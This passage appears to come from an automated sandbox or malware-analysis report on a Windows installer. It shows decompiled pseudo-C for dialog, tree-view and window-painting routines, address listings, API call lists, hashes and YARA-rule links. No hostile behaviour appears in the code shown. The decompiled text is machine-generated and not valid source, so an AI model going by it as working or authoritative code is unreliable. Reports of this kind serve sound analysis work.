										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f4c0 = _a4;
					_v20 = 2;
					 *0x42a8b0 = GlobalAlloc(0x40,  *0x42f48c << 2);
					_t264 = LoadImageA( *0x42f440, 0x6e, 0, 0, 0, 0);
					 *0x42a8a4 =  *0x42a8a4 | 0xffffffff;
					_v16 = _t264;
					 *0x42a8ac = SetWindowLongA(_v8, 0xfffffffc, E004052E8);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a89c = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a89c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062E0(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042D1(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042D1(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f48c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x42a8b0 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x42a8b0 + _t329 * 4) = _t290;
									_v16 =  *( *0x42a8b0 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42f48c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E00404306(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404306(_v12);
								L93:
								return E00404338(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                0x00404cf4
                                                                                0x00404cfc
                                                                                0x00404d04
                                                                                0x00404d0a
                                                                                0x00404d22
                                                                                0x00404d25
                                                                                0x00404d26
                                                                                0x00404f53
                                                                                0x00404f5a
                                                                                0x00404f6e
                                                                                0x00404f5c
                                                                                0x00404f5e
                                                                                0x00404f61
                                                                                0x00404f62
                                                                                0x00404f69
                                                                                0x00404f69
                                                                                0x00404f7a
                                                                                0x00404f88
                                                                                0x00404f8b
                                                                                0x00404fa1
                                                                                0x00405016
                                                                                0x00405019
                                                                                0x0040501b
                                                                                0x00405025
                                                                                0x00405033
                                                                                0x00405033
                                                                                0x00405035
                                                                                0x0040503f
                                                                                0x00405045
                                                                                0x00405048
                                                                                0x0040504b
                                                                                0x00405066
                                                                                0x0040504d
                                                                                0x00405057
                                                                                0x00405057
                                                                                0x0040504b
                                                                                0x0040503f
                                                                                0x00000000
                                                                                0x00405019
                                                                                0x00404fa6
                                                                                0x00404fb1
                                                                                0x00404fb6
                                                                                0x00404fbd
                                                                                0x00404fc2
                                                                                0x00404fc6
                                                                                0x00404fd1
                                                                                0x00404fd1
                                                                                0x00404fd5
                                                                                0x00404fd9
                                                                                0x00404fdd
                                                                                0x00404ff0
                                                                                0x00404fdf
                                                                                0x00404fdf
                                                                                0x00404fe6
                                                                                0x00404fec
                                                                                0x00404fe8
                                                                                0x00404fe8
                                                                                0x00404fe8
                                                                                0x00404fe6
                                                                                0x00404ff4
                                                                                0x00404ff6
                                                                                0x00405009
                                                                                0x0040500c
                                                                                0x0040500f
                                                                                0x0040500f
                                                                                0x00404fd9
                                                                                0x00000000
                                                                                0x00404fc6
                                                                                0x00404fa8
                                                                                0x00404faf
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405069
                                                                                0x00405069
                                                                                0x00405070
                                                                                0x004050e1
                                                                                0x004050e9
                                                                                0x004050f1
                                                                                0x004050f1
                                                                                0x004050fa
                                                                                0x004050fc
                                                                                0x00405103
                                                                                0x00405106
                                                                                0x00405106
                                                                                0x0040510c
                                                                                0x00405113
                                                                                0x00405116
                                                                                0x00405116
                                                                                0x0040511c
                                                                                0x00405122
                                                                                0x00405128
                                                                                0x00405128
                                                                                0x00405135
                                                                                0x00405295
                                                                                0x0040529c
                                                                                0x004052b9
                                                                                0x004052bf
                                                                                0x004052d1
                                                                                0x004052d1
                                                                                0x00000000
                                                                                0x0040513b
                                                                                0x0040513d
                                                                                0x00405142
                                                                                0x00405147
                                                                                0x0040514c
                                                                                0x0040514e
                                                                                0x0040514e
                                                                                0x0040514f
                                                                                0x00405150
                                                                                0x00405152
                                                                                0x00405152
                                                                                0x0040515a
                                                                                0x0040519b
                                                                                0x0040519d
                                                                                0x004051ad
                                                                                0x004051b0
                                                                                0x004051b5
                                                                                0x004051bc
                                                                                0x004051bf
                                                                                0x00405261
                                                                                0x00405269
                                                                                0x00405271
                                                                                0x00405271
                                                                                0x00405277
                                                                                0x0040527f
                                                                                0x00405290
                                                                                0x00405290
                                                                                0x00000000
                                                                                0x0040527f
                                                                                0x004051c5
                                                                                0x004051c8
                                                                                0x004051ce
                                                                                0x004051d3
                                                                                0x004051d5
                                                                                0x004051d7
                                                                                0x004051dd
                                                                                0x004051e4
                                                                                0x004051e9
                                                                                0x004051f0
                                                                                0x004051f3
                                                                                0x004051f3
                                                                                0x004051fa
                                                                                0x00405206
                                                                                0x0040520a
                                                                                0x0040520c
                                                                                0x0040520c
                                                                                0x004051fc
                                                                                0x004051fe
                                                                                0x004051fe
                                                                                0x0040522c
                                                                                0x00405238
                                                                                0x00405247
                                                                                0x00405247
                                                                                0x00405249
                                                                                0x0040524c
                                                                                0x00405255
                                                                                0x00000000
                                                                                0x0040515c
                                                                                0x00405167
                                                                                0x0040516a
                                                                                0x0040516f
                                                                                0x00405171
                                                                                0x00405175
                                                                                0x00405185
                                                                                0x0040518f
                                                                                0x00405191
                                                                                0x00405194
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405177
                                                                                0x00405177
                                                                                0x0040517d
                                                                                0x0040517f
                                                                                0x0040517f
                                                                                0x00405180
                                                                                0x00405181
                                                                                0x00000000
                                                                                0x00405177
                                                                                0x0040515a
                                                                                0x00405135
                                                                                0x00405078
                                                                                0x00000000
                                                                                0x0040508e
                                                                                0x00405098
                                                                                0x0040509d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004050af
                                                                                0x004050b4
                                                                                0x004050c0
                                                                                0x004050c0
                                                                                0x004050c2
                                                                                0x004050d1
                                                                                0x004050d3
                                                                                0x004050d7
                                                                                0x004050da
                                                                                0x00000000
                                                                                0x004050da
                                                                                0x00405078
                                                                                0x00404d2c
                                                                                0x00404d2f
                                                                                0x00404d32
                                                                                0x00404d42
                                                                                0x00404d55
                                                                                0x00404d60
                                                                                0x00404d66
                                                                                0x00404d74
                                                                                0x00404d87
                                                                                0x00404d8c
                                                                                0x00404d97
                                                                                0x00404da0
                                                                                0x00404db6
                                                                                0x00404dc6
                                                                                0x00404dd2
                                                                                0x00404dd2
                                                                                0x00404dd7
                                                                                0x00404ddd
                                                                                0x00404ddf
                                                                                0x00404de2
                                                                                0x00404de7
                                                                                0x00404dec
                                                                                0x00404dee
                                                                                0x00404dee
                                                                                0x00404e0e
                                                                                0x00404e0e
                                                                                0x00404e10
                                                                                0x00404e11
                                                                                0x00404e16
                                                                                0x00404e1c
                                                                                0x00404e20
                                                                                0x00404e25
                                                                                0x00404e2d
                                                                                0x00404e31
                                                                                0x00404e36
                                                                                0x00404e3b
                                                                                0x00404e43
                                                                                0x00404e46
                                                                                0x00404f15
                                                                                0x00404f28
                                                                                0x00000000
                                                                                0x00404e4c
                                                                                0x00404e4f
                                                                                0x00404e52
                                                                                0x00404e55
                                                                                0x00404e55
                                                                                0x00404e5a
                                                                                0x00404e63
                                                                                0x00404e66
                                                                                0x00404e6a
                                                                                0x00404e6d
                                                                                0x00404e70
                                                                                0x00404e79
                                                                                0x00404e82
                                                                                0x00404e85
                                                                                0x00404e88
                                                                                0x00404e8b
                                                                                0x00404ec9
                                                                                0x00404ef4
                                                                                0x00404ecb
                                                                                0x00404eda
                                                                                0x00404eda
                                                                                0x00404e8d
                                                                                0x00404e90
                                                                                0x00404e9e
                                                                                0x00404ea8
                                                                                0x00404eb0
                                                                                0x00404eb7
                                                                                0x00404ec2
                                                                                0x00404ec2
                                                                                0x00404e8b
                                                                                0x00404efa
                                                                                0x00404efb
                                                                                0x00404f07
                                                                                0x00404f07
                                                                                0x00404f13
                                                                                0x00404f2e
                                                                                0x00404f31
                                                                                0x00404f4e
                                                                                0x00000000
                                                                                0x00404f33
                                                                                0x00404f38
                                                                                0x00404f41
                                                                                0x004052d3
                                                                                0x004052e5
                                                                                0x004052e5
                                                                                0x00404f31
                                                                                0x00000000
                                                                                0x00404f13
                                                                                0x00404e46

                                                                                APIs
                                                                                • GetDlgItem.USER32 ref: 00404CED
                                                                                • GetDlgItem.USER32 ref: 00404CFA
                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D49
                                                                                • LoadImageA.USER32 ref: 00404D60
                                                                                • SetWindowLongA.USER32 ref: 00404D7A
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8C
                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA0
                                                                                • SendMessageA.USER32(?,00001109,00000002), ref: 00404DB6
                                                                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404DC2
                                                                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404DD2
                                                                                • DeleteObject.GDI32(00000110), ref: 00404DD7
                                                                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E02
                                                                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E0E
                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EA8
                                                                                • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404ED8
                                                                                  • Part of subcall function 00404306: SendMessageA.USER32(00000028,?,00000001,00404136), ref: 00404314
                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EEC
                                                                                • GetWindowLongA.USER32 ref: 00404F1A
                                                                                • SetWindowLongA.USER32 ref: 00404F28
                                                                                • ShowWindow.USER32(?,00000005), ref: 00404F38
                                                                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00405033
                                                                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00405098
                                                                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004050AD
                                                                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 004050D1
                                                                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 004050F1
                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00405106
                                                                                • GlobalFree.KERNEL32 ref: 00405116
                                                                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0040518F
                                                                                • SendMessageA.USER32(?,00001102,?,?), ref: 00405238
                                                                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00405247
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00405271
                                                                                • ShowWindow.USER32(?,00000000), ref: 004052BF
                                                                                • GetDlgItem.USER32 ref: 004052CA
                                                                                • ShowWindow.USER32(00000000), ref: 004052D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                • String ID: $M$N
                                                                                • API String ID: 2564846305-813528018
                                                                                • Opcode ID: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                                                • Instruction ID: 815a2de4fdf1bcdeb3ef1062daa1c2d9177896ce2fe1d13919dbb69bdfef4a57
                                                                                • Opcode Fuzzy Hash: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                                                • Instruction Fuzzy Hash: 21027BB0A00209AFDB20DF94DD45AAE7BB5FB44314F50817AF610BA2E0C7799E52CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040443C, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 91%
                                                                                			E0040443C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x429884 =  *0x429884 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404338(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42e3e0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_push(1);
								_t40 =  &_v8; // 0x42e3e0
								E004046E0(_a4,  *_t40);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f448, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f448, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x429884 != 0) {
						goto L25;
					} else {
						_t112 =  *0x42a090 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004042F3(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004046BC();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42ec1c; // 0x6aacde
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f498;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00404407;
				E004042D1(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E004042D1(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004042F3( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00404306(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42f454 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x429884 = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x429884 = 0;
				return 0;
			}


















                                                                                0x0040444c
                                                                                0x00404571
                                                                                0x004045cd
                                                                                0x004045d1
                                                                                0x0040469e
                                                                                0x004046a0
                                                                                0x004046a0
                                                                                0x004046a6
                                                                                0x004046a6
                                                                                0x004046a9
                                                                                0x00000000
                                                                                0x004046b0
                                                                                0x004045df
                                                                                0x004045e1
                                                                                0x004045eb
                                                                                0x004045f6
                                                                                0x004045f9
                                                                                0x004045fc
                                                                                0x00404607
                                                                                0x0040460a
                                                                                0x00404611
                                                                                0x0040461f
                                                                                0x00404637
                                                                                0x00404639
                                                                                0x0040463b
                                                                                0x00404641
                                                                                0x00404650
                                                                                0x00404652
                                                                                0x00404652
                                                                                0x00404611
                                                                                0x0040465c
                                                                                0x00000000
                                                                                0x00404667
                                                                                0x0040466b
                                                                                0x0040467c
                                                                                0x0040467c
                                                                                0x00404682
                                                                                0x00404690
                                                                                0x00404690
                                                                                0x00000000
                                                                                0x00404694
                                                                                0x0040465c
                                                                                0x0040457c
                                                                                0x00000000
                                                                                0x00404590
                                                                                0x00404596
                                                                                0x0040459c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004045c1
                                                                                0x004045c3
                                                                                0x004045c8
                                                                                0x00000000
                                                                                0x004045c8
                                                                                0x0040457c
                                                                                0x00404452
                                                                                0x00404455
                                                                                0x0040445a
                                                                                0x0040445c
                                                                                0x0040446b
                                                                                0x0040446b
                                                                                0x00404472
                                                                                0x00404475
                                                                                0x00404477
                                                                                0x0040447c
                                                                                0x00404485
                                                                                0x0040448b
                                                                                0x00404497
                                                                                0x0040449a
                                                                                0x004044a3
                                                                                0x004044a8
                                                                                0x004044ab
                                                                                0x004044b0
                                                                                0x004044c7
                                                                                0x004044ce
                                                                                0x004044e1
                                                                                0x004044e4
                                                                                0x004044f9
                                                                                0x00404500
                                                                                0x00404505
                                                                                0x0040450a
                                                                                0x0040450a
                                                                                0x00404519
                                                                                0x00404528
                                                                                0x0040453a
                                                                                0x0040453f
                                                                                0x0040454f
                                                                                0x00404551
                                                                                0x00000000

                                                                                APIs
                                                                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004044C7
                                                                                • GetDlgItem.USER32 ref: 004044DB
                                                                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004044F9
                                                                                • GetSysColor.USER32(?), ref: 0040450A
                                                                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404519
                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404528
                                                                                • lstrlenA.KERNEL32(?), ref: 0040452B
                                                                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040453A
                                                                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040454F
                                                                                • GetDlgItem.USER32 ref: 004045B1
                                                                                • SendMessageA.USER32(00000000), ref: 004045B4
                                                                                • GetDlgItem.USER32 ref: 004045DF
                                                                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040461F
                                                                                • LoadCursorA.USER32 ref: 0040462E
                                                                                • SetCursor.USER32(00000000), ref: 00404637
                                                                                • LoadCursorA.USER32 ref: 0040464D
                                                                                • SetCursor.USER32(00000000), ref: 00404650
                                                                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040467C
                                                                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404690
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                • String ID: N$B
                                                                                • API String ID: 3103080414-4074832742
                                                                                • Opcode ID: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                                                • Instruction ID: c8b3317feb23aa92da8c88ca1c3cf39d399e1714613d550ff25a6b2d3c0ef38e
                                                                                • Opcode Fuzzy Hash: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                                                • Instruction Fuzzy Hash: 3761A1B1A40209BFDB109F61CD45F6A3BA9FB84744F00443AFB05BA1D1D7BDA9618F98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 90%
                                                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f454;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Setup Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f448;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                                0x0040100a
                                                                                0x00401039
                                                                                0x00401047
                                                                                0x0040104d
                                                                                0x00401051
                                                                                0x0040105b
                                                                                0x00401061
                                                                                0x00401064
                                                                                0x004010f3
                                                                                0x00401089
                                                                                0x0040108c
                                                                                0x004010a6
                                                                                0x004010bd
                                                                                0x004010cc
                                                                                0x004010cf
                                                                                0x004010d5
                                                                                0x004010d9
                                                                                0x004010e4
                                                                                0x004010ed
                                                                                0x004010ef
                                                                                0x004010ef
                                                                                0x00401100
                                                                                0x00401105
                                                                                0x0040110d
                                                                                0x00401110
                                                                                0x00401112
                                                                                0x00401118
                                                                                0x0040111f
                                                                                0x00401126
                                                                                0x00401130
                                                                                0x00401142
                                                                                0x00401156
                                                                                0x00401160
                                                                                0x00401165
                                                                                0x00401165
                                                                                0x00401110
                                                                                0x0040116e
                                                                                0x00000000
                                                                                0x00401178
                                                                                0x00401010
                                                                                0x00401013
                                                                                0x00401015
                                                                                0x0040101f
                                                                                0x0040101f
                                                                                0x00000000

                                                                                APIs
                                                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                • GetClientRect.USER32 ref: 0040105B
                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                • FillRect.USER32 ref: 004010E4
                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                • DrawTextA.USER32(00000000,Setup Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                • String ID: F$Setup Setup
                                                                                • API String ID: 941294808-1602013819
                                                                                • Opcode ID: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                                                • Instruction ID: 0ac27d016dd37b64d299d3f81b39716040336c4aee851974846d4d7042c5b915
                                                                                • Opcode Fuzzy Hash: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                                                • Instruction Fuzzy Hash: CA419C71800249AFCF058FA5DE459AF7FB9FF44314F00802AF991AA1A0C778EA55DFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405EBC, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405EBC(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c648 = 0x4c554e;
				if(_t44 == 0) {
					L3:
